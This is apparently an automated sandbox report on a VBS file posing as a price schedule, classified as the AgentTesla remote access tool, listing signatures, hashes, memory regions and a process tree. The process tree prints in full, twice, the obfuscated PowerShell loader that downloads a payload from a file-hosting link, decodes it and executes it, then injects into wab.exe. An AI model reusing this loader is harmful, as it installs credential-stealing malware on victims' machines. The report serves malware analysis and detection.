Analysis

  • max time kernel
    149s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21/05/2024, 03:42

General

  • Target

    RFQINL21052024_PRICE SCHEDULE.vbs

  • Size

    5KB

  • MD5

    ebdb23546bd0e7f4aee2a75909460482

  • SHA1

    5e11c38b784b7337fc2cc6ab7100c0240476c7a2

  • SHA256

    b1f6ace20017902dbd10246ef780c162d7efa2c6eaa26934b45a784223c72293

  • SHA512

    b16b6573af01d2bd2314c5de1d6dd6e4cbe8080ae0b72fe9180c95f27034e69cef1b1e078162ce7783195f37050d72c9e27940b73203586cc3e1908841faf234

  • SSDEEP

    96:QN7IU07Fzr15ZV3J0j9b0xF6Q/0Gb1plVB4CXcZQfp:QFO7hB/pJ0xb2Fn/hpLCCXcKfp

Malware Config

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RFQINL21052024_PRICE SCHEDULE.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1080
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Respondency = 1;$Cryptovalency='Sub';$Cryptovalency+='strin';$Cryptovalency+='g';Function Orthopsychiatric($Vagtskrmenes){$Niedersachsen=$Vagtskrmenes.Length-$Respondency;For($Propping=1;$Propping -lt $Niedersachsen;$Propping+=2){$militrmissioner+=$Vagtskrmenes.$Cryptovalency.Invoke( $Propping, $Respondency);}$militrmissioner;}function Anthoxanthin($vindruernes){& ($Elev) ($vindruernes);}$Stabstamburers=Orthopsychiatric ' MIoUz i lClLa,/ 5T.,0, ,(KW i.nEd,o,wFs iNGTB N1T0,.U0 ; UW.i nK6D4.;H x.6 4 ;L r,v.: 1C2 1O.,0 )I GTe c.k o,/.2E0 1,0S0T1L0.1 .FBi,r eYfNo,x /.1 2 1 .A0m ';$tickless=Orthopsychiatric 'pUEste r -TAUg,eSnPt, ';$Lance=Orthopsychiatric 'FhRtTt p ss:I/F/ddkrFi vKeA.BgNo.omg l,eE. c,o,m,/OuBcC? ePx peoSr tB=,dSoBwRnzl oMa,d &Ci dB=V1.wAsTY VTlAWBzBj p sFR gRT,8.NR2Gz N P K,5 jTI.fUMAF,1BN o _,d N. ';$Weetbird=Orthopsychiatric ',>, ';$Elev=Orthopsychiatric '.i eDxB ';$Ultra='Termine';$Galopade = Orthopsychiatric 'Pe c h o N%WaFpWp dma,tEaT%S\DM,a c c oB.aC.otf, & & e cSh o .t ';Anthoxanthin (Orthopsychiatric ' $,gClLoSbHaPl.: B lNe,g nQb eItPs =d( c,mCdA /ScG D$CG aBl o p amd e.)H ');Anthoxanthin (Orthopsychiatric 'K$ g lToCbTaGlY:OL o nTg hMaSi rR=.$ULsa n c.e,.IsFpDl.ift (T$SW e eBt,bSiGr dR)U ');$Lance=$Longhair[0];$folkemorderiske= (Orthopsychiatric 'o$ g l oSbFa lB:MACn t.i oWcFhVu.sT=FN eDw -.O b j e,c t PS,yTsPt,e,mC.,N,e t .DW eOb,CGlAiAeDnPt');$folkemorderiske+=$Blegnbets[1];Anthoxanthin ($folkemorderiske);Anthoxanthin (Orthopsychiatric ' $gA,nat,i o.cShhuPsS. HFeBaAdNeKr s [T$ t i cCk l e s sK],=k$ SIt aGbSsKtWaTm b.uSr.eOrCsB ');$Gigantesque=Orthopsychiatric ' $ Abn t iHoScVh u s..sD oTw.n.lPo a dHFSiDl eD( $,LTa nHcAe.,I$AFSa.m e l e,sSsDnseCs ss)H ';$Famelessness=$Blegnbets[0];Anthoxanthin (Orthopsychiatric ' $OgTl oRbIaPlO:.CAaUc oSePpVi.sVt i.cG=.(TTAeTs.t,-tPMa,tLhF I$ F a m ePlGe s s n e s s,)B ');while (!$Cacoepistic) {Anthoxanthin (Orthopsychiatric 'F$PgTlToFbOa,l :,S u l pShboNz iSn.cMaAt,e,= $Gt,r uHeL ') ;Anthoxanthin $Gigantesque;Anthoxanthin (Orthopsychiatric ' SSt aUr tp-,S lPe eupC ,4 ');Anthoxanthin (Orthopsychiatric 'R$EgIl oTb a,lF: C.aTclo e,p i.sBtAiRcB=A(,T,eCsAtI- PQaLtIhR $KF aumCe,l eCsMs,n.e s s,), ') ;Anthoxanthin (Orthopsychiatric ' $,g.l.oPbIa l,:CVaaKl.eRt.a.g eR= $ g.l,oUb aCl.:sSGmLaHd.d e,r k a,s sUeE+C+A% $,L.o nNg.h aBi r .WcPoOu nPtT ') ;$Lance=$Longhair[$Valetage];}$Symbiotism=358810;$Programmeringsmuligheder=27231;Anthoxanthin (Orthopsychiatric '.$.gKl o bSa l.:SO,m,s.t nKi,nLgGsKu,dSvHivk.l i nKg,e.n ,= G,e.tS-,C.o nKt eGnKt O$ F a,mKeTlDe sUsSnreas sM ');Anthoxanthin (Orthopsychiatric 'H$SgKl oAbUaSl : PUhUoTtHo l,yLt e. P=, H[ISAySsStHeFm .CCpoin vMe,rKt.]P:,:DFDr oSmEBFaBs.eP6B4 S,tPrCi,n.gu( $LOAmSs tMnuiUn g,sSuQdPvBi.k lDiBn,g e nG), ');Anthoxanthin (Orthopsychiatric ',$TgRl o b a lS: USdRrOyPdAdCeglKsGeTrTsF2N1F6S I=. [.S yMs,tRebmE.BT.eGxotF.REBn cUo.dsion g ] :.:MAFSUCCIGI..KGSe,tDSEtMr iPn g ( $ PghWo,t o lKyDtFe ). ');Anthoxanthin (Orthopsychiatric '.$,gPl oJb a lL:Pa p.p lGe dFrRo,n e = $.U.d rQy dBd eplLsReTrSs.2H1 6B. sTu b s tSrBiSn.gU(A$BS,yFmUbSiDo tMi,sBmS, $UPHrSoRg,r a.mKm e.r inn,g.sLm uPlSiTg h eNdUedr,) ');Anthoxanthin $appledrone;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:5036
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Macco.Cof && echo t"
        3⤵
          PID:1516
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Respondency = 1;$Cryptovalency='Sub';$Cryptovalency+='strin';$Cryptovalency+='g';Function Orthopsychiatric($Vagtskrmenes){$Niedersachsen=$Vagtskrmenes.Length-$Respondency;For($Propping=1;$Propping -lt $Niedersachsen;$Propping+=2){$militrmissioner+=$Vagtskrmenes.$Cryptovalency.Invoke( $Propping, $Respondency);}$militrmissioner;}function Anthoxanthin($vindruernes){& ($Elev) ($vindruernes);}$Stabstamburers=Orthopsychiatric ' MIoUz i lClLa,/ 5T.,0, ,(KW i.nEd,o,wFs iNGTB N1T0,.U0 ; UW.i nK6D4.;H x.6 4 ;L r,v.: 1C2 1O.,0 )I GTe c.k o,/.2E0 1,0S0T1L0.1 .FBi,r eYfNo,x /.1 2 1 .A0m ';$tickless=Orthopsychiatric 'pUEste r -TAUg,eSnPt, ';$Lance=Orthopsychiatric 'FhRtTt p ss:I/F/ddkrFi vKeA.BgNo.omg l,eE. c,o,m,/OuBcC? ePx peoSr tB=,dSoBwRnzl oMa,d &Ci dB=V1.wAsTY VTlAWBzBj p sFR gRT,8.NR2Gz N P K,5 jTI.fUMAF,1BN o _,d N. ';$Weetbird=Orthopsychiatric ',>, ';$Elev=Orthopsychiatric '.i eDxB ';$Ultra='Termine';$Galopade = Orthopsychiatric 'Pe c h o N%WaFpWp dma,tEaT%S\DM,a c c oB.aC.otf, & & e cSh o .t ';Anthoxanthin (Orthopsychiatric ' $,gClLoSbHaPl.: B lNe,g nQb eItPs =d( c,mCdA /ScG D$CG aBl o p amd e.)H ');Anthoxanthin (Orthopsychiatric 'K$ g lToCbTaGlY:OL o nTg hMaSi rR=.$ULsa n c.e,.IsFpDl.ift (T$SW e eBt,bSiGr dR)U ');$Lance=$Longhair[0];$folkemorderiske= (Orthopsychiatric 'o$ g l oSbFa lB:MACn t.i oWcFhVu.sT=FN eDw -.O b j e,c t PS,yTsPt,e,mC.,N,e t .DW eOb,CGlAiAeDnPt');$folkemorderiske+=$Blegnbets[1];Anthoxanthin ($folkemorderiske);Anthoxanthin (Orthopsychiatric ' $gA,nat,i o.cShhuPsS. HFeBaAdNeKr s [T$ t i cCk l e s sK],=k$ SIt aGbSsKtWaTm b.uSr.eOrCsB ');$Gigantesque=Orthopsychiatric ' $ Abn t iHoScVh u s..sD oTw.n.lPo a dHFSiDl eD( $,LTa nHcAe.,I$AFSa.m e l e,sSsDnseCs ss)H ';$Famelessness=$Blegnbets[0];Anthoxanthin (Orthopsychiatric ' $OgTl oRbIaPlO:.CAaUc oSePpVi.sVt i.cG=.(TTAeTs.t,-tPMa,tLhF I$ F a m ePlGe s s n e s s,)B ');while (!$Cacoepistic) {Anthoxanthin (Orthopsychiatric 'F$PgTlToFbOa,l :,S u l pShboNz iSn.cMaAt,e,= $Gt,r uHeL ') ;Anthoxanthin $Gigantesque;Anthoxanthin (Orthopsychiatric ' SSt aUr tp-,S lPe eupC ,4 ');Anthoxanthin (Orthopsychiatric 'R$EgIl oTb a,lF: C.aTclo e,p i.sBtAiRcB=A(,T,eCsAtI- PQaLtIhR $KF aumCe,l eCsMs,n.e s s,), ') ;Anthoxanthin (Orthopsychiatric ' $,g.l.oPbIa l,:CVaaKl.eRt.a.g eR= $ g.l,oUb aCl.:sSGmLaHd.d e,r k a,s sUeE+C+A% $,L.o nNg.h aBi r .WcPoOu nPtT ') ;$Lance=$Longhair[$Valetage];}$Symbiotism=358810;$Programmeringsmuligheder=27231;Anthoxanthin (Orthopsychiatric '.$.gKl o bSa l.:SO,m,s.t nKi,nLgGsKu,dSvHivk.l i nKg,e.n ,= G,e.tS-,C.o nKt eGnKt O$ F a,mKeTlDe sUsSnreas sM ');Anthoxanthin (Orthopsychiatric 'H$SgKl oAbUaSl : PUhUoTtHo l,yLt e. P=, H[ISAySsStHeFm .CCpoin vMe,rKt.]P:,:DFDr oSmEBFaBs.eP6B4 S,tPrCi,n.gu( $LOAmSs tMnuiUn g,sSuQdPvBi.k lDiBn,g e nG), ');Anthoxanthin (Orthopsychiatric ',$TgRl o b a lS: USdRrOyPdAdCeglKsGeTrTsF2N1F6S I=. [.S yMs,tRebmE.BT.eGxotF.REBn cUo.dsion g ] :.:MAFSUCCIGI..KGSe,tDSEtMr iPn g ( $ PghWo,t o lKyDtFe ). ');Anthoxanthin (Orthopsychiatric '.$,gPl oJb a lL:Pa p.p lGe dFrRo,n e = $.U.d rQy dBd eplLsReTrSs.2H1 6B. sTu b s tSrBiSn.gU(A$BS,yFmUbSiDo tMi,sBmS, $UPHrSoRg,r a.mKm e.r inn,g.sLm uPlSiTg h eNdUedr,) ');Anthoxanthin $appledrone;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2400
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Macco.Cof && echo t"
            4⤵
              PID:4576
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:5012

      Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g2cq0i04.2vu.ps1

              Filesize

              60B

              MD5

              d17fe0a3f47be24a6453e9ef58c94641

              SHA1

              6ab83620379fc69f80c0242105ddffd7d98d5d9d

              SHA256

              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

              SHA512

              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            • C:\Users\Admin\AppData\Roaming\Macco.Cof

              Filesize

              502KB

              MD5

              7f40a091f1c133333e814a35fe64d807

              SHA1

              8d278db73f3e270f33b743f358a9cfa1e3bdbe37

              SHA256

              5454057fe5e349e2139169937a8bb6d34b4e6e6ba83bccebaa4e701f3ccc3edb

              SHA512

              d930b6c0ca34da1f9cad04b5b65218bc98dde299c85627c659ae5a2f25c5321f353f1b826ee4e8bebfa32a2b7184c7a5c69c9e6a4fff42e9232f8604d511dfcb

            • memory/2400-33-0x0000000006340000-0x000000000635A000-memory.dmp

              Filesize

              104KB

            • memory/2400-30-0x0000000005D90000-0x0000000005DAE000-memory.dmp

              Filesize

              120KB

            • memory/2400-35-0x0000000006FE0000-0x0000000007002000-memory.dmp

              Filesize

              136KB

            • memory/2400-15-0x0000000004810000-0x0000000004846000-memory.dmp

              Filesize

              216KB

            • memory/2400-16-0x0000000004EE0000-0x0000000005508000-memory.dmp

              Filesize

              6.2MB

            • memory/2400-17-0x0000000005540000-0x0000000005562000-memory.dmp

              Filesize

              136KB

            • memory/2400-18-0x00000000056E0000-0x0000000005746000-memory.dmp

              Filesize

              408KB

            • memory/2400-19-0x0000000005750000-0x00000000057B6000-memory.dmp

              Filesize

              408KB

            • memory/2400-29-0x00000000058C0000-0x0000000005C14000-memory.dmp

              Filesize

              3.3MB

            • memory/2400-38-0x00000000085D0000-0x000000000CED9000-memory.dmp

              Filesize

              73.0MB

            • memory/2400-31-0x0000000005E50000-0x0000000005E9C000-memory.dmp

              Filesize

              304KB

            • memory/2400-32-0x00000000073F0000-0x0000000007A6A000-memory.dmp

              Filesize

              6.5MB

            • memory/2400-36-0x0000000008020000-0x00000000085C4000-memory.dmp

              Filesize

              5.6MB

            • memory/2400-34-0x0000000007050000-0x00000000070E6000-memory.dmp

              Filesize

              600KB

            • memory/5012-59-0x00000000247B0000-0x0000000024800000-memory.dmp

              Filesize

              320KB

            • memory/5012-60-0x00000000248A0000-0x0000000024932000-memory.dmp

              Filesize

              584KB

            • memory/5012-55-0x0000000000AC0000-0x0000000000B02000-memory.dmp

              Filesize

              264KB

            • memory/5012-54-0x0000000000AC0000-0x0000000001D14000-memory.dmp

              Filesize

              18.3MB

            • memory/5012-61-0x00000000247A0000-0x00000000247AA000-memory.dmp

              Filesize

              40KB

            • memory/5036-58-0x00007FFC7BB40000-0x00007FFC7C601000-memory.dmp

              Filesize

              10.8MB

            • memory/5036-40-0x00007FFC7BB40000-0x00007FFC7C601000-memory.dmp

              Filesize

              10.8MB

            • memory/5036-1-0x000001A61D080000-0x000001A61D0A2000-memory.dmp

              Filesize

              136KB

            • memory/5036-39-0x00007FFC7BB43000-0x00007FFC7BB45000-memory.dmp

              Filesize

              8KB

            • memory/5036-0-0x00007FFC7BB43000-0x00007FFC7BB45000-memory.dmp

              Filesize

              8KB

            • memory/5036-11-0x00007FFC7BB40000-0x00007FFC7C601000-memory.dmp

              Filesize

              10.8MB

            • memory/5036-12-0x00007FFC7BB40000-0x00007FFC7C601000-memory.dmp

              Filesize

              10.8MB